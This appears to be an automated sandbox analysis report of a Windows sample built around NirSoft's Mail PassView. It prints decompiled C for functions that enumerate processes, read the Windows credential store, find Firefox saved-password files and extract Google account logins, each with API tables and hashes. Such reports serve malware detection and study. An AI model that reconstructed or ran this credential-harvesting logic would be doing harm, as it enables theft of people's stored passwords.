                                                  			E0040E056() {
				void* _t1;
				_Unknown_base(*)()* _t2;
				struct HINSTANCE__* _t4;

				if( *0x417514 != 0) {
					return _t1;
				}
				_t2 = GetModuleHandleA("kernel32.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L9:
					return _t2;
				}
				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
				 *0x416fe0 = _t2;
				if(_t2 != 0) {
					_t2 = GetProcAddress(_t4, "Module32First");
					 *0x416fd8 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "Module32Next");
						 *0x416fd4 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "Process32First");
							 *0x416e6c = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "Process32Next");
								 *0x416fcc = _t2;
								if(_t2 != 0) {
									 *0x417514 = 1;
								}
							}
						}
					}
				}
				goto L9;
			}






                                                  0x0040e05d
                                                  0x0040e0d9
                                                  0x0040e0d9
                                                  0x0040e065
                                                  0x0040e06b
                                                  0x0040e06f
                                                  0x0040e0d8
                                                  0x00000000
                                                  0x0040e0d8
                                                  0x0040e07e
                                                  0x0040e082
                                                  0x0040e087
                                                  0x0040e08f
                                                  0x0040e093
                                                  0x0040e098
                                                  0x0040e0a0
                                                  0x0040e0a4
                                                  0x0040e0a9
                                                  0x0040e0b1
                                                  0x0040e0b5
                                                  0x0040e0ba
                                                  0x0040e0c2
                                                  0x0040e0c6
                                                  0x0040e0cb
                                                  0x0040e0cd
                                                  0x0040e0cd
                                                  0x0040e0cb
                                                  0x0040e0ba
                                                  0x0040e0a9
                                                  0x0040e098
                                                  0x00000000

                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040DD19), ref: 0040E065
                                                  • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040E07E
                                                  • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040E08F
                                                  • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040E0A0
                                                  • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0040E0B1
                                                  • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040E0C2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$HandleModule
                                                  • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                  • API String ID: 667068680-3953557276
                                                  • Opcode ID: 5922207fa155356ca208c5dc00e328b28cc838d796c506d44ffc4ba24ef585aa
                                                  • Instruction ID: 921299a9b586d994e9bf5e85ab2a2688844625279e80e39ff2614b99c2d6d575
                                                  • Opcode Fuzzy Hash: 5922207fa155356ca208c5dc00e328b28cc838d796c506d44ffc4ba24ef585aa
                                                  • Instruction Fuzzy Hash: 8DF06D70A45222A9C320CB266D00FFA3DA85A44B81B15843BE900F1694DBF8D5528B7C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00404647, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 41libraryloaderCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00404647(struct HINSTANCE__** __eax, void* __edi, void* __eflags) {
				void* __esi;
				struct HINSTANCE__* _t12;
				struct HINSTANCE__** _t23;

				_t23 = __eax;
				E004046C2(__eax);
				_t12 = LoadLibraryA("advapi32.dll");
				 *_t23 = _t12;
				if(_t12 != 0) {
					_t23[2] = GetProcAddress(_t12, "CredReadA");
					_t23[3] = GetProcAddress( *_t23, "CredFree");
					_t23[4] = GetProcAddress( *_t23, "CredDeleteA");
					_t23[5] = GetProcAddress( *_t23, "CredEnumerateA");
					_t23[6] = GetProcAddress( *_t23, "CredEnumerateW");
					if(_t23[2] == 0 || _t23[3] == 0) {
						E004046C2(_t23);
					} else {
						_t23[1] = 1;
					}
				}
				return _t23[1];
			}






                                                  0x00404648
                                                  0x0040464a
                                                  0x00404654
                                                  0x0040465c
                                                  0x0040465e
                                                  0x00404676
                                                  0x00404682
                                                  0x0040468e
                                                  0x0040469a
                                                  0x004046a3
                                                  0x004046a7
                                                  0x004046b8
                                                  0x004046af
                                                  0x004046af
                                                  0x004046af
                                                  0x004046a7
                                                  0x004046c1

                                                  APIs
                                                    • Part of subcall function 004046C2: FreeLibrary.KERNEL32(?,0040464F,?,0040D601,80000001,75D6F420), ref: 004046C9
                                                  • LoadLibraryA.KERNEL32(advapi32.dll,?,0040D601,80000001,75D6F420), ref: 00404654
                                                  • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 0040466D
                                                  • GetProcAddress.KERNEL32(?,CredFree), ref: 00404679
                                                  • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404685
                                                  • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404691
                                                  • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040469D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$Library$FreeLoad
                                                  • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                  • API String ID: 2449869053-4258758744
                                                  • Opcode ID: 1dbd091348eef99b9c60bfcaa5dda145de35d3414d0ae1ecd7a3a02af1b4a616
                                                  • Instruction ID: 1c6fa8d05b29e269fad2443f962c2e8eb3052cc88d23d174a3c6f0c0958544ff
                                                  • Opcode Fuzzy Hash: 1dbd091348eef99b9c60bfcaa5dda145de35d3414d0ae1ecd7a3a02af1b4a616
                                                  • Instruction Fuzzy Hash: 380121705447009AC730AF75CD08B46BAF4EF85704F218D2EE281A3690E7BE9491DF88
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00411015, Relevance: 19.7, APIs: 12, Strings: 1, Instructions: 202stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 76%
                                                  			E00411015(void* __ecx, signed int __edx, void* __eflags, signed int _a4, intOrPtr _a8, char* _a12, signed int* _a16) {
				void _v8;
				void _v12;
				void _v24;
				char _v39;
				void _v40;
				char _v132;
				void _v1156;
				void _v1172;
				char _v1180;
				void _v1187;
				char _v1188;
				void _v2228;
				void _v2243;
				void _v2244;
				void _v3267;
				char _v3268;
				void _v4291;
				char _v4292;
				char _v5340;
				void _v5347;
				char _v5348;
				char _v6116;
				char _v7136;
				void _v7140;
				void* __edi;
				void* __esi;
				int _t86;
				void* _t109;
				void* _t122;
				void* _t135;
				char _t156;
				signed char _t168;
				signed int _t171;
				intOrPtr _t177;
				signed int _t183;
				void* _t185;

				_t171 = __edx;
				E004118A0(0x1be4, __ecx);
				_t156 = 0;
				_v3268 = 0;
				memset( &_v3267, 0, 0x3ff);
				_a8 = E00410E8A(_a8,  &_v3268);
				_t86 = strlen(_a4);
				_v8 = _t86;
				if(_a8 > 4) {
					_t193 = _t86;
					if(_t86 > 0) {
						asm("movsd");
						asm("movsd");
						asm("movsb");
						_v2244 = 0;
						memset( &_v2243, 0, 0x41e);
						_v1188 = 0;
						memset( &_v1187, 0, 0x41e);
						_v5348 = 0;
						memset( &_v5347, 0, 0x41e);
						_v40 = 0;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosw");
						asm("stosb");
						_v4292 = 0;
						memset( &_v4291, 0, 0x3ff);
						E0040BC49( &_v132);
						E0040BC6D(_v8,  &_v132, _a4);
						_t181 =  &_v132;
						E0040BD0B( &_v39,  &_v132,  &_v2244);
						memcpy( &_v2228,  &_v24, 8);
						E0040BC49( &_v132);
						_push( &_v2244);
						_t109 = 0x18;
						E0040BC6D(_t109,  &_v132);
						E0040BD0B( &_v39, _t181,  &_v1188);
						memcpy( &_v1172,  &_v2244, 0x10);
						memcpy( &_v1156,  &_v24, 8);
						E0040BC49(_t181);
						_push( &_v1188);
						_t122 = 0x28;
						E0040BC6D(_t122, _t181);
						E0040BD0B( &_v39, _t181,  &_v5348);
						E0040535A( &_v6116, _t193,  &_v1180,  &_v5348);
						E004053D6( &_v5340,  &_v1188,  &_v4292,  &_v6116);
						_t177 = _a8;
						asm("cdq");
						_t183 = _t177 + (_t171 & 0x00000007) >> 3;
						_a4 = 0;
						if(_t183 > 0) {
							do {
								E004053D6(_t185 + (_a4 << 3) - 0xcc0,  &_v6116, _t185 + (_a4 << 3) - 0x10b8,  &_v6116);
								_a4 =  &(_a4[1]);
							} while (_a4 < _t183);
							_t177 = _a8;
						}
						_t135 = 0;
						if(_t177 > _t156) {
							do {
								_t168 =  *(_t185 + _t135 - 0x10c0) ^  *(_t185 + _t135 - 0xcc0);
								_t135 = _t135 + 1;
								 *(_t185 + _t135 - 0x1be1) = _t168;
							} while (_t135 < _t177);
						}
						 *((char*)(_t185 + _t177 - 0x1be0)) = _t156;
						strcpy(_a12,  &_v7136);
						E0040BC49( &_v132);
						_t67 = _t177 - 4; // 0x0
						E0040BC6D(_t67,  &_v132, _a12);
						E0040BD0B(_t177,  &_v132,  &_v40);
						memcpy( &_v8,  &_v40, 4);
						memcpy( &_v12,  &_v7140, 4);
						_t156 = 1;
						 *_a16 = 0 | _v8 == _v12;
					}
				}
				return _t156;
			}







































                                                  0x00411015
                                                  0x0041101d
                                                  0x00411025
                                                  0x00411034
                                                  0x0041103a
                                                  0x00411053
                                                  0x00411056
                                                  0x00411060
                                                  0x00411063
                                                  0x00411069
                                                  0x0041106b
                                                  0x00411079
                                                  0x0041107a
                                                  0x0041107b
                                                  0x0041108a
                                                  0x00411090
                                                  0x0041109e
                                                  0x004110a4
                                                  0x004110b2
                                                  0x004110b8
                                                  0x004110bf
                                                  0x004110c5
                                                  0x004110c6
                                                  0x004110c7
                                                  0x004110c8
                                                  0x004110cf
                                                  0x004110d8
                                                  0x004110de
                                                  0x004110e6
                                                  0x004110f4
                                                  0x00411100
                                                  0x00411103
                                                  0x00411115
                                                  0x0041111f
                                                  0x0041112a
                                                  0x0041112d
                                                  0x00411130
                                                  0x0041113c
                                                  0x00411151
                                                  0x00411163
                                                  0x0041116a
                                                  0x00411175
                                                  0x00411178
                                                  0x0041117b
                                                  0x00411187
                                                  0x004111a6
                                                  0x004111be
                                                  0x004111c3
                                                  0x004111c8
                                                  0x004111d0
                                                  0x004111d8
                                                  0x004111db
                                                  0x004111dd
                                                  0x004111f8
                                                  0x004111fd
                                                  0x00411203
                                                  0x00411206
                                                  0x00411206
                                                  0x00411209
                                                  0x0041120d
                                                  0x0041120f
                                                  0x00411216
                                                  0x0041121d
                                                  0x00411220
                                                  0x00411220
                                                  0x0041120f
                                                  0x00411233
                                                  0x0041123a
                                                  0x00411242
                                                  0x0041124a
                                                  0x00411250
                                                  0x0041125c
                                                  0x0041126b
                                                  0x0041127d
                                                  0x00411295
                                                  0x00411296
                                                  0x00411296
                                                  0x0041106b
                                                  0x0041129e

                                                  APIs
                                                  • memset.MSVCRT ref: 0041103A
                                                    • Part of subcall function 00410E8A: strlen.MSVCRT ref: 00410E97
                                                  • strlen.MSVCRT ref: 00411056
                                                  • memset.MSVCRT ref: 00411090
                                                  • memset.MSVCRT ref: 004110A4
                                                  • memset.MSVCRT ref: 004110B8
                                                  • memset.MSVCRT ref: 004110DE
                                                    • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCFE
                                                    • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD2A
                                                    • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD40
                                                    • Part of subcall function 0040BD0B: memcpy.MSVCRT ref: 0040BD77
                                                    • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD81
                                                  • memcpy.MSVCRT ref: 00411115
                                                    • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCB0
                                                    • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCDA
                                                    • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD52
                                                  • memcpy.MSVCRT ref: 00411151
                                                  • memcpy.MSVCRT ref: 00411163
                                                  • strcpy.MSVCRT(?,?), ref: 0041123A
                                                  • memcpy.MSVCRT ref: 0041126B
                                                  • memcpy.MSVCRT ref: 0041127D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memcpymemset$strlen$strcpy
                                                  • String ID: salu
                                                  • API String ID: 2660478486-4177317985
                                                  • Opcode ID: ae1d07347fa3aa89f5fcc6141a6fc90f028ff7b9ab687112944546eff88cf5b8
                                                  • Instruction ID: 480a48fc981763c339c301d1addb7ab339a070bf665ce532ed27993edd9122c1
                                                  • Opcode Fuzzy Hash: ae1d07347fa3aa89f5fcc6141a6fc90f028ff7b9ab687112944546eff88cf5b8
                                                  • Instruction Fuzzy Hash: A4717F7190011DAADB10EBA9CC819DEB7BDFF08348F1445BAF609E7151DB749B888F94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00403E87, Relevance: 19.6, APIs: 7, Strings: 6, Instructions: 98stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 81%
                                                  			E00403E87(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr* _v8;
				char _v76;
				void _v1099;
				char _v1100;
				void _v2123;
				char _v2124;
				void _v3147;
				char _v3148;
				char _v4172;
				void* __ebx;
				void* __esi;
				void* _t36;
				void* _t37;
				void* _t48;
				void* _t55;
				intOrPtr* _t56;
				signed int _t58;
				intOrPtr* _t63;
				void* _t70;
				void* _t71;

				_t56 = __ecx;
				E004118A0(0x1048, __ecx);
				_t63 = _t56;
				_v8 = _t63;
				E00405EFD(_a4, "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
				_v1100 = 0;
				memset( &_v1099, 0, 0x3ff);
				_v3148 = 0;
				memset( &_v3147, 0, 0x3ff);
				_v2124 = 0;
				memset( &_v2123, 0, 0x3ff);
				_t71 = _t70 + 0x2c;
				if( *0x417308 != 0) {
					sprintf( &_v3148, "<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>", 0x417308);
					_t71 = _t71 + 0xc;
				}
				if( *0x417304 != 0) {
					strcpy( &_v1100, "<table dir=\"rtl\"><tr><td>\r\n");
				}
				_t36 =  *((intOrPtr*)( *_t63 + 0x1c))();
				_t58 = 0x10;
				_push(_t36);
				_t37 = memcpy( &_v76, "<html><head>%s<title>%s</title></head>\r\n<body>\r\n%s <h3>%s</h3>\r\n", _t58 << 2);
				asm("movsb");
				sprintf( &_v4172,  &_v76,  &_v3148, _t37,  &_v1100);
				E00405EFD(_a4,  &_v4172);
				_push("Mail PassView");
				_t55 = 6;
				_push(E004078FF(_t55));
				sprintf( &_v2124, "<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
				_t48 = E00405EFD(_a4,  &_v2124);
				_t78 = _a8 - 4;
				if(_a8 == 4) {
					return E004097E6(_v8, _t78, _a4);
				}
				return _t48;
			}























                                                  0x00403e87
                                                  0x00403e8f
                                                  0x00403e9f
                                                  0x00403ea1
                                                  0x00403ea4
                                                  0x00403eb9
                                                  0x00403ebf
                                                  0x00403ecd
                                                  0x00403ed3
                                                  0x00403ee1
                                                  0x00403ee7
                                                  0x00403eec
                                                  0x00403ef5
                                                  0x00403f08
                                                  0x00403f0d
                                                  0x00403f0d
                                                  0x00403f16
                                                  0x00403f24
                                                  0x00403f2a
                                                  0x00403f2f
                                                  0x00403f34
                                                  0x00403f35
                                                  0x00403f3e
                                                  0x00403f5a
                                                  0x00403f5b
                                                  0x00403f6a
                                                  0x00403f72
                                                  0x00403f79
                                                  0x00403f7f
                                                  0x00403f8c
                                                  0x00403f9b
                                                  0x00403fa3
                                                  0x00403fa7
                                                  0x00000000
                                                  0x00403faf
                                                  0x00403fb8

                                                  APIs
                                                    • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                    • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,74B04DE0,00000000,?,?,004092ED,00000001,00412B1C,74B04DE0), ref: 00405F17
                                                  • memset.MSVCRT ref: 00403EBF
                                                  • memset.MSVCRT ref: 00403ED3
                                                  • memset.MSVCRT ref: 00403EE7
                                                  • sprintf.MSVCRT ref: 00403F08
                                                  • strcpy.MSVCRT(?,<table dir="rtl"><tr><td>), ref: 00403F24
                                                  • sprintf.MSVCRT ref: 00403F5B
                                                  • sprintf.MSVCRT ref: 00403F8C
                                                  Strings
                                                  • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403F36
                                                  • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403F86
                                                  • Mail PassView, xrefs: 00403F72
                                                  • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403E97
                                                  • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403F02
                                                  • <table dir="rtl"><tr><td>, xrefs: 00403F1E
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memsetsprintf$FileWritestrcpystrlen
                                                  • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>$Mail PassView
                                                  • API String ID: 1043021993-495024357
                                                  • Opcode ID: 9ab723875cfdb90570c6b26727e8dc31f2cea9ea6bbea43a89162690f7ebea04
                                                  • Instruction ID: b86957a5e19b08f75c710fe46d40d6f019605627493d012667a382a844d4f915
                                                  • Opcode Fuzzy Hash: 9ab723875cfdb90570c6b26727e8dc31f2cea9ea6bbea43a89162690f7ebea04
                                                  • Instruction Fuzzy Hash: A93196B2C40118BADB11EB55DC82EDE7BACEF44304F0045A7B60DA3151DE786FC88BA8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00404288, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00404288(intOrPtr __ecx, void* __esi, void* __fp0, wchar_t** _a4) {
				intOrPtr _v8;
				char _v280;
				char _v408;
				intOrPtr _v412;
				char _v796;
				intOrPtr _v800;
				char _v928;
				char _v940;
				wchar_t* _t23;
				char* _t41;
				wchar_t** _t59;
				void* _t76;

				_t76 = __fp0;
				_t59 = _a4;
				_t23 =  *_t59;
				_v8 = __ecx;
				if(_t23 != 0 && _t59[1] != 0 && _t59[2] != 0 && wcsstr(_t23, L"www.google.com") != 0) {
					E004021D8( &_v940);
					_v800 = 7;
					_v412 = 3;
					WideCharToMultiByte(0, 0, _t59[1], 0xffffffff,  &_v408, 0x7f, 0, 0);
					WideCharToMultiByte(0, 0, _t59[2], 0xffffffff,  &_v280, 0x7f, 0, 0);
					strcpy( &_v928,  &_v408);
					strcpy( &_v796,  &_v408);
					if(strchr( &_v796, 0x40) == 0 && strlen( &_v408) + 0xa < 0x7f) {
						sprintf( &_v796, "%s@gmail.com",  &_v408);
					}
					_t41 = strchr( &_v928, 0x40);
					if(_t41 != 0) {
						 *_t41 = 0;
					}
					E00402407( &_v940, _t76, _v8 + 0xfffff788);
				}
				return 1;
			}















                                                  0x00404288
                                                  0x00404293
                                                  0x00404296
                                                  0x0040429c
                                                  0x0040429f
                                                  0x004042d3
                                                  0x004042ee
                                                  0x004042fa
                                                  0x00404304
                                                  0x00404318
                                                  0x00404328
                                                  0x0040433b
                                                  0x00404354
                                                  0x0040437e
                                                  0x00404383
                                                  0x0040438f
                                                  0x00404398
                                                  0x0040439a
                                                  0x0040439a
                                                  0x004043ab
                                                  0x004043ab
                                                  0x004043b6

                                                  APIs
                                                  • wcsstr.MSVCRT ref: 004042BD
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00404304
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00404318
                                                  • strcpy.MSVCRT(?,?), ref: 00404328
                                                  • strcpy.MSVCRT(?,?,?,?), ref: 0040433B
                                                  • strchr.MSVCRT ref: 00404349
                                                  • strlen.MSVCRT ref: 0040435D
                                                  • sprintf.MSVCRT ref: 0040437E
                                                  • strchr.MSVCRT ref: 0040438F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWidestrchrstrcpy$sprintfstrlenwcsstr
                                                  • String ID: %s@gmail.com$www.google.com
                                                  • API String ID: 1359934567-4070641962
                                                  • Opcode ID: 8108c03dee5360a7f6a3e2f925f6b83e3505abd913d650f45db378c2ca998167
                                                  • Instruction ID: 90bd0330eeb49ee3a27dc93359d6b9986b282e86ae315167fefd13048bcd18fc
                                                  • Opcode Fuzzy Hash: 8108c03dee5360a7f6a3e2f925f6b83e3505abd913d650f45db378c2ca998167
                                                  • Instruction Fuzzy Hash: 793188B290021D7FDB21D791DD81FDAB3ACDB44354F1005A7F709E2181D678AF858A58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040827A, Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 69stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 96%
                                                  			E0040827A(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, char* _a8) {
				void _v4103;
				char _v4104;
				int _t21;
				int _t28;
				void* _t35;

				_t35 = __eflags;
				E004118A0(0x1004, __ecx);
				strcpy(0x4171b8, _a8);
				strcpy(0x4172c0, "general");
				E00407E55(_t35, "TranslatorName", 0x412466);
				E00407E55(_t35, "TranslatorURL", 0x412466);
				EnumResourceNamesA(_a4, 4, E004080A3, 0);
				EnumResourceNamesA(_a4, 5, E004080A3, 0);
				strcpy(0x4172c0, "strings");
				_t28 = 0;
				_v4104 = 0;
				memset( &_v4103, 0, 0x1000);
				do {
					_t21 = LoadStringA(_a4, _t28,  &_v4104, 0x1000);
					if(_t21 > 0) {
						_t21 = E00407EC3(_t28,  &_v4104);
					}
					_t28 = _t28 + 1;
				} while (_t28 <= 0xffff);
				 *0x4171b8 = 0;
				return _t21;
			}








                                                  0x0040827a
                                                  0x00408282
                                                  0x00408292
                                                  0x004082a2
                                                  0x004082b2
                                                  0x004082bd
                                                  0x004082d8
                                                  0x004082e2
                                                  0x004082ea
                                                  0x004082f5
                                                  0x004082ff
                                                  0x00408306
                                                  0x0040830e
                                                  0x0040831a
                                                  0x00408322
                                                  0x0040832c
                                                  0x00408332
                                                  0x00408333
                                                  0x00408334
                                                  0x0040833e
                                                  0x00408347

                                                  APIs
                                                  • strcpy.MSVCRT(004171B8,00000000,00000000,00000000,?,?,004083AB,00000000,?,00000000,00000104,?), ref: 00408292
                                                  • strcpy.MSVCRT(004172C0,general,004171B8,00000000,00000000,00000000,?,?,004083AB,00000000,?,00000000,00000104,?), ref: 004082A2
                                                    • Part of subcall function 00407E55: memset.MSVCRT ref: 00407E7A
                                                    • Part of subcall function 00407E55: GetPrivateProfileStringA.KERNEL32(004172C0,00000104,00412466,?,00001000,004171B8), ref: 00407E9E
                                                    • Part of subcall function 00407E55: WritePrivateProfileStringA.KERNEL32(004172C0,?,?,004171B8), ref: 00407EB5
                                                  • EnumResourceNamesA.KERNEL32 ref: 004082D8
                                                  • EnumResourceNamesA.KERNEL32 ref: 004082E2
                                                  • strcpy.MSVCRT(004172C0,strings,?,004083AB,00000000,?,00000000,00000104,?), ref: 004082EA
                                                  • memset.MSVCRT ref: 00408306
                                                  • LoadStringA.USER32 ref: 0040831A
                                                    • Part of subcall function 00407EC3: _itoa.MSVCRT ref: 00407EE4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Stringstrcpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                  • String ID: TranslatorName$TranslatorURL$general$strings
                                                  • API String ID: 1060401815-3647959541
                                                  • Opcode ID: acaf4a6ca7367b184f6fdf17ade1074e09c73fb74d797c334c49b365d943b025
                                                  • Instruction ID: d5eae57ffc3fdd8f11c9b4c351fac369e1a37aafa95eb04bb89d09d1e585c4c7
                                                  • Opcode Fuzzy Hash: acaf4a6ca7367b184f6fdf17ade1074e09c73fb74d797c334c49b365d943b025
                                                  • Instruction Fuzzy Hash: 6E1104319802543AD7212B56DC06FCB3E6DCF85B59F1040BBB708B6191C9BC9EC087AD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040D1EC, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 128stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 83%
                                                  			E0040D1EC(intOrPtr* __eax, void* __eflags, intOrPtr _a4) {
				void _v267;
				char _v268;
				void* __edi;
				void* __esi;
				void* _t31;
				int _t40;
				void* _t44;
				void* _t49;
				char* _t50;
				void* _t57;
				int _t62;
				char* _t68;
				void* _t70;
				void* _t73;
				void* _t74;
				intOrPtr* _t86;
				char* _t89;
				void* _t90;
				char** _t91;

				_t86 = __eax;
				_t31 = E00406C2F(__eax + 0x1c, __eax, __eflags, _a4);
				_t94 = _t31;
				if(_t31 == 0) {
					__eflags = 0;
					return 0;
				}
				E0040462E(_t86 + 0x468);
				_t68 = _t86 + 0x158;
				E004061FF(_t68, _a4);
				_t89 = _t86 + 0x25d;
				 *_t89 = 0;
				E0040C530(_t94, _t86 + 0x18);
				if( *_t89 == 0) {
					_t62 = strlen(_t68);
					 *_t91 = "signons.txt";
					_t9 = strlen(??) + 1; // 0x1
					if(_t62 + _t9 >= 0x104) {
						 *_t89 = 0;
					} else {
						E004062AD(_t89, _t86 + 0x158, "signons.txt");
					}
				}
				_v268 = 0;
				memset( &_v267, 0, 0x104);
				_t40 = strlen(_t86 + 0x158);
				_t91[3] = "signons.sqlite";
				_t15 = strlen(??) + 1; // 0x1
				_pop(_t73);
				if(_t40 + _t15 >= 0x104) {
					_v268 = 0;
				} else {
					E004062AD( &_v268, _t86 + 0x158, "signons.sqlite");
					_pop(_t73);
				}
				_t98 =  *_t89;
				if( *_t89 != 0) {
					_t57 = E00406C2F(_t86 + 4, _t86, _t98, _t89);
					_t99 = _t57;
					if(_t57 != 0) {
						E0040C475(_t73, _t86, _t99);
					}
				}
				_t44 = E0040614B( &_v268);
				_t100 = _t44;
				_pop(_t74);
				if(_t44 != 0) {
					E0040CE28(_t74, _t100, _t86,  &_v268);
				}
				_t70 = 0;
				if( *((intOrPtr*)(_t86 + 0x474)) <= 0) {
					L19:
					return 1;
				} else {
					do {
						_t90 = E0040D438(_t70, _t86 + 0x468);
						_t24 = _t90 + 0x504; // 0x504
						_t49 = _t24;
						_push("none");
						_push(_t49);
						L004115B2();
						if(_t49 != 0) {
							_t25 = _t90 + 4; // 0x4
							_t50 = _t25;
							if( *_t50 == 0) {
								_t26 = _t90 + 0x204; // 0x204
								strcpy(_t50, _t26);
							}
							 *((intOrPtr*)( *_t86 + 4))(_t90);
						}
						_t70 = _t70 + 1;
					} while (_t70 <  *((intOrPtr*)(_t86 + 0x474)));
					goto L19;
				}
			}






















                                                  0x0040d1fb
                                                  0x0040d200
                                                  0x0040d205
                                                  0x0040d207
                                                  0x0040d371
                                                  0x00000000
                                                  0x0040d371
                                                  0x0040d213
                                                  0x0040d21b
                                                  0x0040d223
                                                  0x0040d22c
                                                  0x0040d233
                                                  0x0040d236
                                                  0x0040d23e
                                                  0x0040d241
                                                  0x0040d248
                                                  0x0040d254
                                                  0x0040d25e
                                                  0x0040d277
                                                  0x0040d260
                                                  0x0040d26e
                                                  0x0040d274
                                                  0x0040d25e
                                                  0x0040d288
                                                  0x0040d28f
                                                  0x0040d29e
                                                  0x0040d2a5
                                                  0x0040d2b1
                                                  0x0040d2ba
                                                  0x0040d2bb
                                                  0x0040d2d8
                                                  0x0040d2bd
                                                  0x0040d2cf
                                                  0x0040d2d5
                                                  0x0040d2d5
                                                  0x0040d2df
                                                  0x0040d2e2
                                                  0x0040d2e8
                                                  0x0040d2ed
                                                  0x0040d2ef
                                                  0x0040d2f1
                                                  0x0040d2f1
                                                  0x0040d2ef
                                                  0x0040d2fd
                                                  0x0040d302
                                                  0x0040d304
                                                  0x0040d305
                                                  0x0040d30f
                                                  0x0040d30f
                                                  0x0040d314
                                                  0x0040d31c
                                                  0x0040d36c
                                                  0x00000000
                                                  0x0040d31e
